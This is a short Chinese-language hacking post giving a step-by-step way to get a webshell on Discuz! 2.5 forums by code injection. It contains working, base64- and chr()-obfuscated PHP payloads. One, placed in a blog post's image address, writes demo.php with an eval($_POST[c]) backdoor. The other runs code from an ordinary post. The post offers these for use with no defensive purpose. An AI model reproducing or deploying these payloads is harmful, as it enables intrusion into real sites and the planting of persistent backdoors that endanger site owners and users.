DZ!2.5 后台拿 WebShell 方法!

时间:2021-05-21 21:26:42

直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。

1.注册任意账户

2.登陆用户,发表blog日志(注意是日志)

3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

4.访问日志,论坛根目录下生成demo.php,一句话密码C

这个必须是要开启seo

在这个地方。二个的都是这个地方。

DZ!2.5 后台拿 WebShell 方法!

最新更新的是能直接在贴子里面拿shell。。

利用方式也并非非得发blog,也不是非得发网络图片,详细的利用我是比如随便发个贴子,内容

DZ!2.5 后台拿 WebShell 方法!

${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}

然后给他加上任意超链接,发布即可phpinfo(),

这个自己换成char就可以了

DZ!2.5 后台拿 WebShell 方法!

自己敢兴趣的怎么网上搜。好多的。